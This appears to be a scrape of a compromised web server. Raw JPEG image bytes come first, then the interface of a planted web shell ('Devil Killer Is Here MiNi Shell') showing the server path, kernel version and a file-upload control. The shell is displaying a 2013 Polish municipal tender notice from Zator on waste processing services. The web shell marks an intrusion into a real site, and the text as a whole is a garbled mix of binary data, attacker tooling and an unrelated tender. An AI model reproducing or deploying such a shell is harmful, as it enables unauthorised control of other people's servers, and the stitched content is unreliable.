JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130430/172320-N-2013.html

<p class="kh_header"><b>Zator: Zagospodarowanie i przetwarzanie odpadów komunalnych z gminy Zator w regionalnej instalacji do przetwarzania odpadów zwanej dalej instalacją, zlokalizowanej w regionie zachodnim województwa małopolskiego, w tym m.in. sortowanie, kompostowanie i unieszkodliwianie odpadów po sortowaniu, poprzez składowanie na regionalnym składowisku odpadów komunalnych.</b><br>
<b>Numer ogłoszenia: 172320 - 2013; data zamieszczenia: 30.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Zatora , Plac Marszałka Józefa Piłsuskiego 1, 32-640 Zator, woj. małopolskie, tel. 33 8412215, faks 33 84 10 206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zator.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie i przetwarzanie odpadów komunalnych z gminy Zator w regionalnej instalacji do przetwarzania odpadów zwanej dalej instalacją, zlokalizowanej w regionie zachodnim województwa małopolskiego, w tym m.in. sortowanie, kompostowanie i unieszkodliwianie odpadów po sortowaniu, poprzez składowanie na regionalnym składowisku odpadów komunalnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje w szczególności wykonywanie usług w zakresie:
1/ mechaniczno-biologicznego przetwarzania zmieszanych odpadów komunalnych i wydzielenie ze zmieszanych odpadów komunalnych frakcji nadających się w całości lub w części do odzysku,
2/ przetwarzania selektywnie zebranych odpadów zielonych i innych bioodpadów zgodnie z ustawą o odpadach, tekst jednolity Dz.U. z dnia 08.01.2013, poz. 21, art. 35, pkt 6, ppkt. 2. Prowadzenie mechaniczno-biologicznego procesu przetwarzania zmieszanych odpadów komunalnych (frakcja podsitowa 0-80 mm) zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11.09.2012, Dz.U. poz. 1052 .
3/ składowania odpadów powstających w procesie mechaniczno-biologicznego przetwarzania zmieszanych odpadów komunalnych oraz pozostałości z sortowania odpadów komunalnych.
Prognozowana ilość oraz rodzaj odpadów przeznaczonych do przetwarzania jest zawarta w formularzu cenowym, będącym częścią zał. nr 1 do oferty - formularza ofertowego oraz poniższej tabeli i wynosi łącznie około - 3.095,00 Mg. Wykonawca zobowiązuje się do przyjęcia rzeczywistej ilości odpadów, różniącej się w dół lub w górę od prognozowanych.

I. Odpady przeznaczone do składowania	3.095,00
1. Odpady betonu, gruz betonowy z remontów, kod odpadów 17 01 01: 65,00Mg
2. Odpady z gruzu ceglanego, kod odpadów 17 01 02: 15,00Mg
3. Odpady ulegające biodegradacji, kod odpadów	20 02 01:	60,00Mg
4. Niesegregowane (zmieszane) odpady komunalne, kod odpadów 20 03 01: 2.890,00Mg
5. Odpady wielkogabarytowe, kod odpadów 20 03 07: 55,00Mg
6. Odpady komunalne niewymienione w innych podgrupach, kod odpadów 20 03 99: 10,00Mg

2. Warunki realizacji zamówienia :
1/ W zakresie dostarczania odpadów:
a/ odpady wyszczególnione w formularzu cenowym, będą odbierane z nieruchomości na których zamieszkują mieszkańcy oraz z nieruchomości na których nie zamieszkują mieszkańcy - przez wyłonionego w drodze przetargu operatora, któremu zamawiający powierzy odbieranie i transport odpadów komunalnych, zwanym dalej operatorem,
b/ wszystkie dostarczane odpady muszą być ważone na legalizowanej wadze samochodowej o dokładności +/- 20 kg (wykonawca będzie przedstawiał na żądanie zamawiającego wyniki badań z legalizacji wagi oraz kopię legalizacji wagi),
c/ każdy pojazd dostarczający odpady musi być dwukrotnie ważony: raz z ładunkiem i drugi raz bez ładunku,
d/ ilość dostarczonych odpadów ma być każdorazowo wpisywana i potwierdzana w dokumentach operatora przez osoby posiadające odpowiednie uprawnienia,
e/ wykonawca zobowiązany jest po zakończeniu każdego miesiąca (do 5-go dnia roboczego następnego miesiąca) przesłać w formie elektronicznej (standard bazy danych, np. w pliku XML, XLS) zapis wag pojazdów operatora za dany miesiąc,
f/ zamawiający zastrzega sobie możliwość dokonania kontrolnego ważenia na innej legalizowanej wadze samochodowej; w przypadku różnicy powyżej 5% wagi ładunku dokonane zostaną powtórne ważenia na lokalnej wybranej przez Wykonawcę legalizowanej wadze. Jeżeli wynik ważenia Wykonawcy potwierdzi wynik ważenia zamawiającego wykonawca będzie zobowiązany dokonać ponownej kalibracji wagi,
g/ w przypadku wystąpienia różnicy w ważeniu na niekorzyść zamawiającego, wykonawca zobowiązany jest skorygować wagi w danym okresie rozliczeniowym,
h/ zamawiający zastrzega sobie prawo do dostarczenia w okresie obowiązywania umowy mniejszej ilości odpadów (każdego rodzaju i łącznie), niż określone w załączniku nr 1; zamawiający zastrzega sobie również prawo do przekazania do unieszkodliwienia większej ilości odpadów, niż określono w zał. nr 1, które będą rozliczane wg. cen jednostkowych podanych w ofercie i umowie. Tak więc ilości odpadów do zagospodarowania wskazane w niniejszej SIWZ są wartościami prognozowanymi i mogą ulec zmniejszeniu lub zwiększeniu, na co wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu powyższych zmian ilościowych w trakcie realizacji przedmiotu zamówienia.
2/  W zakresie odbioru odpadów:
a/ dojazd do miejsca zrzutu odpadów winien być utwardzony tak, aby pojazdy operatora o dopuszczalnym nacisku 100 kN miały zachowaną możliwość rozładunku niezależnie od warunków atmosferycznych i ich wpływu na podłoże, po uprzednim zważeniu odpadów,
b/ teren przy rozładunku winien być utwardzony i dostosowany do swobodnego zawracania i cofania pojazdów operatora w umownie przyjętym promieniu 20 m,
c/ miejsce rozładunku powinno być należycie zabezpieczone przed dostępem osób postronnych podczas rozładunku odpadów,
d/ wykonawca zapewni możliwość dezynfekcji kół pojazdów operatora opuszczających instalację po wyładowaniu odpadów,
e/ za wszystkie uszkodzenia pojazdów wynikłe ze złego stanu technicznego dróg dojazdowych i miejsc manewrowych na terenie instalacji będzie odpowiadał wykonawca,
f/ wykonawca umożliwi mycie kół i podwozi pojazdów operatora na terenie instalacji,
g/ wykonawca zobowiązany jest do natychmiastowego poinformowania zamawiającego o każdej sytuacji powodującej utrudnienia w zagospodarowaniu dowiezionych odpadów lub braku możliwości takiego zagospodarowania. W przypadku braku możliwości zagospodarowania odpadów wykonawca zobowiązany jest wskazać instalację zastępczą oraz wziąć na siebie wszystkie zobowiązania wynikające z tego faktu, a instalacja wskazana przez wykonawcę podlegać będzie akceptacji zamawiającego.
h/ wykonawca zabezpieczy odbiór odpadów w dni robocze w godzinach od 6.00 do 18.00. W szczególnych przypadkach odpady mogą być przyjmowane w innych dniach i godzinach.
i/ w przypadku wystąpienia awarii lub innej przyczyny uniemożliwiającej przyjmowanie odpadów, wykonawca wskaże instalację zastępczą i poniesie wszelkie koszty związane z tak zaistniałą sytuacją. Instalacja wskazana  przez wykonawcę podlegać będzie akceptacji przez zamawiającego,
j/ wykonawca zobowiązany jest do zawarcia umowy na zagospodarowanie odpadów z wybranym przez zamawiającego operatorem.

3/  W zakresie ewidencji i rozliczania odpadów:
a/ każda faktycznie dostarczona przez operatora ilość odpadów będzie ewidencjonowana przez wykonawcę z obligatoryjnym rozbiciem na: nr rejestracyjny pojazdu dostarczającego odpad, określony kod odpadu oraz datę i godzinę dostarczenia odpadów,
b/ wykonawca zobowiązany jest do zamieszczania na swojej stronie internetowej wszelkich informacji dotyczących zagospodarowania odpadów dostarczonych przez zamawiającego,
c/ na potwierdzenie faktycznej ilości zagospodarowanych odpadów wykonawca podpisze operatorowi karty przekazania odpadów,
d/ wykonawca będzie przekazywał zamawiającemu informacje wymagane ustawą z dnia 13 września 1996r. o utrzymaniu porządku i czystości w gminach (Dz.U z 2012r. poz 391) lub obowiązującymi rozporządzeniami, konieczne do rozliczenia osiąganych poziomów odzysku i recyklingu poszczególnych grup odpadów.
e/ fakturowanie za dostarczone do zagospodarowania odpady będzie się odbywało za każdy miesiąc kalendarzowy z dołu,
f/ faktura powinna zawierać   ilość   i   rodzaj   odpadu   oraz   cenę   jednostkową   jego zagospodarowania.  Podstawą   do   wystawienia   faktury   za   wykonane   prace   będzie uprzednie rozliczenie ilości odebranych odpadów zgodnie z warunkami odbioru zadania, o których mowa w niniejszym rozdziale specyfikacji,
g/ na   potwierdzenie   faktycznej   ilości   przekazanych   odpadów   przedstawiciel zamawiającego   dostarczy   karty   przekazania   odpadów   zgodnie   z   obowiązującymi przepisami,
h/ prawidłowo wystawione faktury VAT płatne będą przelewem w terminie do 30 dni od daty wpływu faktury VAT,
i/ za   wykonanie   prac   stanowiących   przedmiot   zamówienia   zamawiający   zapłaci wynagrodzenie według cen jednostkowych wskazanych w ofercie,
j/ zamawiający nie dopuszcza możliwości waloryzacji cen jednostkowych netto wykonawcy w okresie trwania umowy, w żadnym przypadku.

4/  W zakresie postępowania z odpadami:
a/ wykonawca jest odpowiedzialny za osiąganie poziomów odzysku wskazanych w ustawie z dnia 13 września 1996r. O utrzymaniu porządku czystości w gminach (Dz.U. z 2012r. poz 391), Rozporządzeniu Ministra Środowiska z dnia 29 maja2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami frakcji odpadów komunalnych (Dz.U. z 2012r. poz. 645) oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.U z 2012r. poz. 676),
b/ odpady o frakcji powyżej 80mm z sita bębnowego, powinny trafić do kabiny sortowniczej celem ich przesortowania.
c/ frakcja odpadów 0-80mm winna być odsiewana i przewożona do kompostowania.

5/  W zakresie wymagań prawnych i środowiskowych dotyczących zagospodarowania odpadów:
Wykonawca powinien posiadać status instalacji regionalnej w regionie zachodnim województwa małopolskiego zgodnie z obowiązującymi przepisami prawa, w tym w szczególności zgodnie z ustawą o utrzymaniu czystości i porządku w gminach oraz rozporządzeniami w powyższej sprawie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium - 18.000,00 zł, w jednej z form opisanych w art. 45-46 ustawy, wniesione przed terminem otwarcia ofert (oryginał dokumentu złożony przed otwarciem ofert u Skarbnika Gminy, kopia dołączona do oferty). W przypadku wpłaty gotówkowej - nr konta Zamawiającego : 
     60 8136 0000 0000 1544 2000 0170  Bank Spółdzielczy w Zatorze.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy udokumentują posiadanie aktualnego zezwolenia zintegrowanego na prowadzenie instalacji. 
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą należyte wykonanie w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, następujących usług:
       - co   najmniej   jedna   usługa   przesortowania   niesegregowanych   (zmieszanych) odpadów   komunalnych     odbieranych od właścicieli nieruchomości lub przez podmioty odbierające odpady od właścicieli   nieruchomości w ilości co najmniej 3.000 Mg,
       - co   najmniej   jedna   usługa   zagospodarowania   odpadów   poprzez   składowanie niesegregowanych   (zmieszanych) odpadów komunalnych w ilości co najmniej 3.000 Mg.
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują potencjałem technicznym  oraz      osobami zdolnymi do wykonania zamówienia, tj.:
    1/ wykażą prawo do dysponowania co najmniej jedną osobą posiadającą doświadczenie w kierowaniu          składowiskiem odpadów,
    2/ wykażą prawo do dysponowania  potencjałem technicznym w zakresie posiadania sprzętu i urządzeń          technicznych niezbędnych do realizacji przedmiotu zamówienia, tj :
a/ instalacją do mechaniczno-biologicznego przetwarzania odpadów komunalnych w skład której wchodzi m.in: linia sortownicza zmieszanych odpadów komunalnych z sitem bębnowym o oczkach 20 mm i 80 mm, 
b/ separatorem   magnetycznym   i   przenośnikami   taśmowymi,   kabiną sortowniczą, o przepustowości co najmniej odpowiadającej ilości odpadów zamawiającego przewidzianych do zagospodarowania,
c/ instalacją do składowania odpadów powstających w procesie mechaniczno-biologicznego   przetwarzania   zmieszanych   odpadów   komunalnych   oraz pozostałości   z   sortowania   odpadów   komunalnych   przeznaczonych   do składowania,
d/ instalacją do kompostowania odpadów zielonych i odpadów ulegających biodegradacji, oraz frakcji   podsitowej 0-80 mm wyposażoną w bioreaktory, każdy o przepustowości co najmniej 300 Mg wraz z odpowiednim   zapleczem   do   kompostowania   w   pryzmach,   sterownią   i przepompownią ścieków,
e/ kompaktorem - co najmniej 1szt.,
f/ ładowarką - co najmniej 1szt.,
g/ wagą samochodową - co najmniej 1szt.,
h/ wózkiem widłowym - co najmniej 1szt.,
i/ automatyczną myjką do kół i podwozi samochodowych - co najmniej 1szt.
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują potencjałem technicznym  oraz      osobami zdolnymi do wykonania zamówienia, tj.:
    1/ wykażą prawo do dysponowania co najmniej jedną osobą posiadającą doświadczenie w kierowaniu          składowiskiem odpadów,
    2/ wykażą prawo do dysponowania  potencjałem technicznym w zakresie posiadania sprzętu i urządzeń          technicznych niezbędnych do realizacji przedmiotu zamówienia, tj :
a/ instalacją do mechaniczno-biologicznego przetwarzania odpadów komunalnych w skład której wchodzi m.in: linia sortownicza zmieszanych odpadów komunalnych z sitem bębnowym o oczkach 20 mm i 80 mm, 
b/ separatorem   magnetycznym   i   przenośnikami   taśmowymi,   kabiną sortowniczą, o przepustowości co najmniej odpowiadającej ilości odpadów zamawiającego przewidzianych do zagospodarowania,
c/ instalacją do składowania odpadów powstających w procesie mechaniczno-biologicznego   przetwarzania   zmieszanych   odpadów   komunalnych   oraz pozostałości   z   sortowania   odpadów   komunalnych   przeznaczonych   do składowania,
d/ instalacją do kompostowania odpadów zielonych i odpadów ulegających biodegradacji, oraz frakcji   podsitowej 0-80 mm wyposażoną w bioreaktory, każdy o przepustowości co najmniej 300 Mg wraz z odpowiednim   zapleczem   do   kompostowania   w   pryzmach,   sterownią   i przepompownią ścieków,
e/ kompaktorem - co najmniej 1szt.,
f/ ładowarką - co najmniej 1szt.,
g/ wagą samochodową - co najmniej 1szt.,
h/ wózkiem widłowym - co najmniej 1szt.,
i/ automatyczną myjką do kół i podwozi samochodowych - co najmniej 1szt.
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają opłaconą w dacie złożenia oferty     polisę, a w przypadku jej braku inny dokument, potwierdzający, że wykonawca jest ubezpieczony od     odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.  
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
